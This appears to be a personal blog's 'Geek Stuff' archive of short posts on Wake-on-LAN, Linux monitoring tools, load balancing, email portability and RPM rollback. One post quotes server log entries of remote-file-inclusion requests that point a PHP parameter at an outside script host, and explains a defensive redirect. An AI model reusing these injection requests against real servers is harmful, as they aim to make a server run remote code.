Archive for category Geek Stuff

I deal with computers and large systems on a daily basis and consider myself a pretty knowledgeable guy when it comes to this subject. I do recognize that there are a lot of things that I have ‘heard’ about, but don’t really know much about. One such subject is the whole ‘Wake-on-LAN’ functionality that has been built into computers and operating systems for the last few years, yet remains a mystery to many folks.

Wake on LAN (WOL, sometimes WoL) is an Ethernet computer networking standard that allows a shut-down computer to be booted remotely.

Okay, I know that, but how do I actually implement it?

Today, I came across an article that details exactly how to use this feature on a PC running Windows, or on a Mac. Lifehacker’s feature story titled “Access Your Computer Anytime and Save Energy with Wake-on-LAN” is one of the best primers as to how to set this up and actually use it. I have multiple computers on my home network that go into ‘sleep mode’ when not used for extensive periods of time, and being able to wake them up remotely to use services on them would be of great use to me. And being able to remotely ‘turn on’ a computer that has been shutdown would be of tremendous use, especially for some computers that won’t turn themselves back to their last power state after a power failure.

With today’s introduction of Amazon’s Kindle e-book reader, I’ve decided that there are two products that would cover all my personal entertainment needs this year. The new Amazon Kindle is simply amazing, and would be the single-most reason I could get back into reading books other than technical manuals. The iPod Touch would provide all my video, podcasting and music needs, all in one small package. So, if anyone is feeling generous this year, I’m also providing a couple handy links where you can purchase these items for someone you love.

I’m currently in the midst of building a new workstation to replace the one I’ve been using at home for almost 5 years now. While I currently run Windows XP, I’ll probably give Windows Vista Ultimate Edition a shot on the new box. As such, I’m always on the lookout for cool little ‘eye candy’ that could make my Vista experience a better one. My good friend Dan pointed me to something he came across:

While doing some regular maintance on some websites I manage, I came across some interesting entries in the logs for one of our servers. Hundreds and hundreds of the following types of requests, originating from a wide variety of IP's:

GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt?GET /modules.php?op=http://amyru.h18.ru/images/cs.txt?

Basically, there are a bunch of 'infected' web servers out there which are trying to get our server to execute code stored in a file on a remote server. The file in the cases above is named 'cs.txt'. You can see the contents of the script/file by reading Dan Langille's sanitized version of the attack script.

While our server was not vulnerable to the attack, I was getting very annoyed with having to respond to the script each time it hit our server with a request. Our server had to run some code, determine that the page didn't exist, produce a page that a normal user would see explaining why their request could not be completed, etc. Then it hit me. Why are we spending all this precious cpu time for these attackers? Why not have them waste their own cpu time? And that's when I decided that the attack script should attack itself. In simple terms, when our web server notices an attack coming in, it simply redirects the request to the originating server. In essence, it's like requesting a webpage from a server, being told that the page has moved and be given a new address to go to. In this case, the new address is http://127.0.0.1. Without getting too technical, that's called a Loopback Address and is a network standard which always points to yourself.

Here's what I put in the Apache webserver httpd.conf file, which is the configuration file for the Apache web server on the Linux server I wanted to modify:

So now, whenever a request comes in which contains the string 'cs.txt?' in the URL request, I inform the requester that the file they are requesting has been permanently moved to 'http://127.0.0.1', the loopback address and in essence, itself.

While the hits on the server continue, I have noticed they have slowed down, I'm assuming because the remote server is busy talking to itself for a moment. I also have the satisfaction of knowing our server isn't wasting its time with these trojan hits, and letting them talk to themselves for a bit instead.

Yesterday, I posted about how htop was my new replacement for top on all Linux systems I manage. Tonight, while looking through the Google search words that lead people to my site, I found a Google result page which contained a 'hit' that immediately caught my eye. Mike Malone, of the I'm Mike blog had an entry titled 'Top 5 tops: keep tabs on your system'. In it, he describes not only the htop utility I came across earlier, but 4 additional tops to make any Linux administrator smile.

mtop (MySQL top) monitors a MySQL server showing the queries which are taking the most amount of time to complete. Features include 'zooming' in on a process to show the complete query, 'explaining' the query optimizer information for a query and 'killing' queries. In addition, server performance statistics, configuration information, and tuning tips are provided.

Apachetop is a curses-based top-like display for Apache information, including requests per second, bytes per second, most popular URLs, etc.

iftop does for network usage what top does for CPU usage. It listens to network traffic on a named interface and displays a table of current bandwidth usage by pairs of hosts. Handy for answering the question "why is our ADSL link so slow?".

While I use mtop on a regular basis, and have now started using htop, the other 3 monitors definitely look like they're going to be part of my 'tools' for the various servers I manage. iftop and apachetop seem especially interesting to me, given their more specialized monitoring target.

Every now and then, Sun's Research group comes out with something that seems very interesting and leaves me wondering if this is the direction we might be heading in. It's difficult to describe Sun Labs Lively Kernel, so I'll simply quote from their website:

The Sun Labs Lively Kernel is a novel web programming environment developed by Project Flair at Sun Labs. The main goal of the Lively Kernel is to bring the same kind of simplicity, generality and flexibility to web programming that we have known in desktop programming for thirty years, but without the installation and upgrade hassles than conventional desktop applications have.

Remember all those rumors about how Google was developing an OS which would run in a browser? Well, this is the closest thing that I've seen to such a beast. When you visit the Sun Labs Lively Kernel page, click on the 'Enter Lively Kernel' tab to see the prototype in action. While performance was slow for me, it gives you a good idea of where we could be heading in the future.

This person doesn't seem to understand the difference between a phone number and a domain name. Domain names are actually entities, bought and owned by someone or a company. The key word is owned. You don't 'own' the email address, in essence, you're 'renting' it! You stop paying, or you move elsewhere, do you really expect the owner to keep handling your e-mail? Even the Postal Service doesn't do this! They'll forward your mail for a few weeks until you notify everyone, and then they're done and out of the loop.

Also, think about the inefficiencies of such a requirement. Over time, someone could change email addresses 2, 3, maybe even 5 times. Say I send an email to address #1 with a 10Mb attachment. According to this petition, the email sent to address #1 would be forwarded to address #2, then from there to address #3, until it gets to address #5. My email has been handled by 5 different ISP's, and they all had to absorb the cost of moving my bytes over to another ISP, and so on. Absolutely ridiculous if you ask me.

I'm all for asking ISP's to do something like this for a very short period of time, just like the Postal Service. But, I would do it somewhat differently. Instead of burdening the ISP's with handling large volumes of potentially large pieces of mail, why not have them issue a 'bounce' back to the sender, with a small note indicating the recipient has 'moved' and here is his/her new email address. We're now talking about an email with a size of 1000 to 2000 bytes, instead of in the megabytes. We avoid forwarding spam, and if the sender email doesn't exist, no second bounce is issued, avoiding a mail loop. I know of a few ISP's that already do this as a courtesy to their customers who have decided to move on. That's just good business if you ask me; never ignore an ex-client, because they might want to come back in the future.

So instead of petitioning for e-mail address portability, we should be asking ISP's to implement some sort of email 'address' forwarding/bounce functionality instead. It's cleaner, more efficient and much less of a burden on ISP's and the infrastructure as a whole.

So you’re writing a large web application, with multiple web servers on the front-end waiting to serve your users. First thing you do is start to think about a Load Balancing solution, be it a hardware solution such as a Coyote Point Systems box, or even a ‘software’ solution, such as Round Robin DNS. Now, with the advent of ‘Web 2.0’, we’re slowly seeing another ‘solution’ starting to gain some traction; Client Side Load Balancing.

To put it simply, we let each ‘client’ decide which server to connect to. Each client has a list of all available servers, and randomly selects one and attempts to exchange data. If the client receives a message indicating the server is busy, or no response at all within a set period of time, it moves to another server on the list until it can complete its transaction. Lei Zhu, a contributor at Digital Web, has this to say about the advantages of such a solution:

Distribute loads among a cluster of application servers. Since the client randomly selects the server it connects to, the loads should be distributed evenly among the servers.

Handle failover of an application server gracefully. The client has the ability to failover to another server when the chosen server does not respond within a preset period of time. The application server connection seamlessly fails over to another server.

Ensure the cluster of servers appears to the end user as a single server. In the example, the user simply points a browser to http://www.myloadbalancedwebsite.com/. The actual server used is transparent to the user.

A big advantage to such a solution is that you don’t need to spend money on a hardware device, at least in the short-term. You can have some code on your back-end that monitors the web servers and removes any unavailable servers from the server list sent to each client.

Another advantage that Lei points out is that the web servers can be distributed anywhere geographically. Sure, this can be done with a load balancer, but it’s a far trickier and complicated setup then just having to change a server entry in a file sent to each client.

Lei’s article also includes a short write-up of an application, Voxlite, using such a design.

Overall, while I still have some doubts regarding the scalability of such a solution, it’s an interesting use of Web 2.0.

I use a MySQL database in most, if not all, my website development projects. In some cases, especially with applications/sites that tend to get a large number of hits (and as such, a greater number of interactions with the database), it’s nice to be able to see what the DB engine is doing, how many threads are running, etc. My tool of choice has been MyTop by Jeremy Zawodny for a couple years now. Recently, it looks like someone wanting to learn some Ajax has decided to port Jeremy’s great tool over to an ajaxified webpage! No need to login to the database server and run mytop in a console anymore; now I can do it straight from a web browser!

My good friend Scott reminded me of an old site we had found a while back when we needed to whip up one of those browser favicons for a project we were assigned to. A browser favicon is basically that little logo/image you see next to the url when you go to certain sites. It’s also used as the logo when you save any page on such a site as a bookmark.

This online tool enables you to upload any image and it will convert it to the favicon format on the fly. It’s a great timesaver when you don’t want to start from scratch and want to get something you can tweak to your liking.

There’s a little-known option in RPM that enables the rollback of package installs. Think of it like an undo option in your favorite application; it will rollback the package install to a previously known state/version. Yum support this option in Fedora Core 4 (and upcoming Core 5); here’s an excerpt taken from Chris Tyler’s posting on OreillyNet:

Here are cut-to-the-chase directions on using this feature:

To configure yum to save rollback information, add the line tsflags=repackage to /etc/yum.conf.

To configure command-line rpm to do the same thing, add the line %_repackage_all_erasures 1 to /etc/rpm/macros.